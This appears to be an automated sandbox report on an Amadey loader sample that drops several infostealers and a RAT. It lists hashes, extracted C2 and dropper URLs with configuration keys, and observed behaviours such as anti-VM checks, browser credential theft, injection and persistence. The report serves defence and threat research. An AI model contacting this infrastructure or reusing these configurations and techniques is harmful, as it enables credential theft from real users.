amadey | 22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
18/02/2025, 06:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

da013399e13811ab7a5f1ea197773829.exe
Size

2.0MB
MD5

da013399e13811ab7a5f1ea197773829
SHA1

91ad2313b83426686c4594c02ccbe97b92e714fe
SHA256

22e3d26fae68cfca1eb87a0341dc3b8dfa0937f47c26b6aa23ed828cab0a6bf0
SHA512

f84c24a857a6a874e25d132ffebdd22443e8149424f961ea604812f7004a63705e970c4c22cb488baa5bd47b34215142a36eef47159129dcaf66a0de219c55fd
SSDEEP

49152:5ojBIGhDjjr6UQd0/yfSdKjA6jbDWl2HLWfxan5ejm:OGGhK9daKA6jTrWE5W

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

cryptbot

http://home.fivecc5vs.top/RkxPTSBLYxNxxrPaLizI17

Extracted

Family

stealc

Botnet

reno

http://185.215.113.115

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

vidar

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

redline

Botnet

cheat

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

http://ecozessentials.com

Attributes

url_path
/e6cb1c8fc7cd1659.php

Extracted

Family

lumma

https://mercharena.biz/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
Cryptbot family
cryptbot

Detect Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral2/memory/5748-1029-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7

Detects CryptBot payload 1 IoCs

CryptBot is a C++ stealer distributed widely in bundle with other software.

spyware stealer

resource	yara_rule
behavioral2/memory/3740-190-0x0000000069CC0000-0x000000006A71B000-memory.dmp	family_cryptbot_v3

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/memory/824-1824-0x0000000000620000-0x0000000000A98000-memory.dmp	family_sectoprat
behavioral2/memory/824-1827-0x0000000000620000-0x0000000000A98000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	37da4af4b8.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d2YQIJa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	08228ffca5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	37da4af4b8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ba087850fc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5636d338cb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	da013399e13811ab7a5f1ea197773829.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ace2630f44.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	b2212dd3dd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bea16bd486.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8d61319260.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	48ec5f039a.exe

Blocklisted process makes network request 64 IoCs

flow	pid	Process
142	388	powershell.exe
260	3008	powershell.exe
264	3008	powershell.exe
289	3008	powershell.exe
290	3008	powershell.exe
300	3008	powershell.exe
305	3008	powershell.exe
306	3008	powershell.exe
310	3008	powershell.exe
313	3008	powershell.exe
315	3008	powershell.exe
319	3008	powershell.exe
321	3008	powershell.exe
323	3008	powershell.exe
328	3008	powershell.exe
329	3008	powershell.exe
330	3008	powershell.exe
331	3008	powershell.exe
332	3008	powershell.exe
333	3008	powershell.exe
334	3008	powershell.exe
335	3008	powershell.exe
343	3008	powershell.exe
344	3008	powershell.exe
345	3008	powershell.exe
346	3008	powershell.exe
347	3008	powershell.exe
348	3008	powershell.exe
349	3008	powershell.exe
350	3008	powershell.exe
351	3008	powershell.exe
352	3008	powershell.exe
359	3008	powershell.exe
364	3008	powershell.exe
367	3008	powershell.exe
368	3008	powershell.exe
370	3008	powershell.exe
374	3008	powershell.exe
376	3008	powershell.exe
378	3008	powershell.exe
382	3008	powershell.exe
383	3008	powershell.exe
387	3008	powershell.exe
388	3008	powershell.exe
389	3008	powershell.exe
391	3008	powershell.exe
395	3008	powershell.exe
396	3008	powershell.exe
397	3008	powershell.exe
398	3008	powershell.exe
399	3008	powershell.exe
400	3008	powershell.exe
402	3008	powershell.exe
405	3008	powershell.exe
406	3008	powershell.exe
408	3008	powershell.exe
410	3008	powershell.exe
411	3008	powershell.exe
412	3008	powershell.exe
413	3008	powershell.exe
416	3008	powershell.exe
417	3008	powershell.exe
418	3008	powershell.exe
419	3008	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
6032	powershell.exe
388	powershell.exe
3416	powershell.exe

Downloads MZ/PE file 20 IoCs

flow	pid	Process
142	388	powershell.exe
17	4956	skotes.exe
17	4956	skotes.exe
17	4956	skotes.exe
17	4956	skotes.exe
19	4956	skotes.exe
19	4956	skotes.exe
19	4956	skotes.exe
19	4956	skotes.exe
19	4956	skotes.exe
19	4956	skotes.exe
19	4956	skotes.exe
19	4956	skotes.exe
19	4956	skotes.exe
19	4956	skotes.exe
19	4956	skotes.exe
30	5944	futors.exe
53	4420	BitLockerToGo.exe
56	3404	BitLockerToGo.exe
208	5724	BitLockerToGo.exe

Uses browser remote debugging 2 TTPs 13 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5344	chrome.exe
5812	chrome.exe
5804	chrome.exe
5796	chrome.exe
1168	chrome.exe
6492	msedge.exe
4356	msedge.exe
6280	msedge.exe
1216	chrome.exe
1660	chrome.exe
4260	chrome.exe
5712	msedge.exe
6204	msedge.exe

Checks BIOS information in registry 2 TTPs 32 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	37da4af4b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bea16bd486.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bea16bd486.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	da013399e13811ab7a5f1ea197773829.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ace2630f44.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	b2212dd3dd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ba087850fc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5636d338cb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	48ec5f039a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5636d338cb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ba087850fc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	b2212dd3dd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d2YQIJa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d2YQIJa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	da013399e13811ab7a5f1ea197773829.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	48ec5f039a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	08228ffca5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ace2630f44.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	37da4af4b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8d61319260.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8d61319260.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	08228ffca5.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	da013399e13811ab7a5f1ea197773829.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	37da4af4b8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation	7aencsM.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe

Executes dropped EXE 36 IoCs

pid	Process
4956	skotes.exe
3792	amnew.exe
5944	futors.exe
2012	jROrnzx.exe
3780	jROrnzx.exe
4532	jROrnzx.exe
3740	37da4af4b8.exe
1172	skotes.exe
4160	qFqSpAp.exe
5832	futors.exe
3040	48ec5f039a.exe
3660	5636d338cb.exe
3552	ace2630f44.exe
5000	b2212dd3dd.exe
5736	a196afcbb6.exe
3460	00610290ee.exe
5360	Bjkm5hE.exe
4324	Bjkm5hE.exe
1404	Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE
2332	d2YQIJa.exe
2804	DTQCxXZ.exe
4404	bea16bd486.exe
792	Ta3ZyUR.exe
1472	Ta3ZyUR.exe
1872	8d61319260.exe
5860	service123.exe
3616	7aencsM.exe
5748	7aencsM.exe
4364	skotes.exe
880	futors.exe
5820	service123.exe
824	08228ffca5.exe
7088	ba087850fc.exe
1516	skotes.exe
6488	futors.exe
2688	service123.exe

Identifies Wine through registry keys 2 TTPs 16 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	37da4af4b8.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	ace2630f44.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	b2212dd3dd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	bea16bd486.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	08228ffca5.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	8d61319260.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	d2YQIJa.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	ba087850fc.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	48ec5f039a.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	5636d338cb.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine	da013399e13811ab7a5f1ea197773829.exe

Loads dropped DLL 3 IoCs

pid	Process
5860	service123.exe
5820	service123.exe
2688	service123.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a196afcbb6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085413001\\a196afcbb6.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\00610290ee.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085414001\\00610290ee.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\37da4af4b8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10006970101\\37da4af4b8.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\48ec5f039a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10006980101\\48ec5f039a.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ace2630f44.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085411001\\ace2630f44.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b2212dd3dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085412001\\b2212dd3dd.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000023cbf-206.dat	autoit_exe
behavioral2/files/0x0007000000023cc2-242.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs

pid	Process
4124	da013399e13811ab7a5f1ea197773829.exe
4956	skotes.exe
3740	37da4af4b8.exe
1172	skotes.exe
3040	48ec5f039a.exe
3660	5636d338cb.exe
3552	ace2630f44.exe
5000	b2212dd3dd.exe
1404	Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE
2332	d2YQIJa.exe
4404	bea16bd486.exe
1872	8d61319260.exe
4364	skotes.exe
824	08228ffca5.exe
7088	ba087850fc.exe
1516	skotes.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 2012 set thread context of 4532	2012	jROrnzx.exe	92
PID 3040 set thread context of 4420	3040	48ec5f039a.exe	108
PID 3660 set thread context of 3404	3660	5636d338cb.exe	111
PID 5360 set thread context of 4324	5360	Bjkm5hE.exe	135
PID 792 set thread context of 1472	792	Ta3ZyUR.exe	158
PID 4404 set thread context of 5724	4404	bea16bd486.exe	167
PID 3616 set thread context of 5748	3616	7aencsM.exe	177

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	da013399e13811ab7a5f1ea197773829.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
2308	2012	WerFault.exe	89
2228	5360	WerFault.exe	134
3560	792	WerFault.exe	157
2864	3740	WerFault.exe	97
1064	3616	WerFault.exe	175

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	37da4af4b8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	a196afcbb6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8d61319260.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a196afcbb6.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	a196afcbb6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DTQCxXZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d2YQIJa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ta3ZyUR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5636d338cb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jROrnzx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ace2630f44.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	00610290ee.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp6ZEGGEVYREPLWB9DBYD2R56YX3HA5GQK.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ba087850fc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	qFqSpAp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	48ec5f039a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	08228ffca5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bea16bd486.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	da013399e13811ab7a5f1ea197773829.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jROrnzx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b2212dd3dd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ta3ZyUR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe

Checks processor information in registry 2 TTPs 15 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7aencsM.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	37da4af4b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	37da4af4b8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7aencsM.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
6312	timeout.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
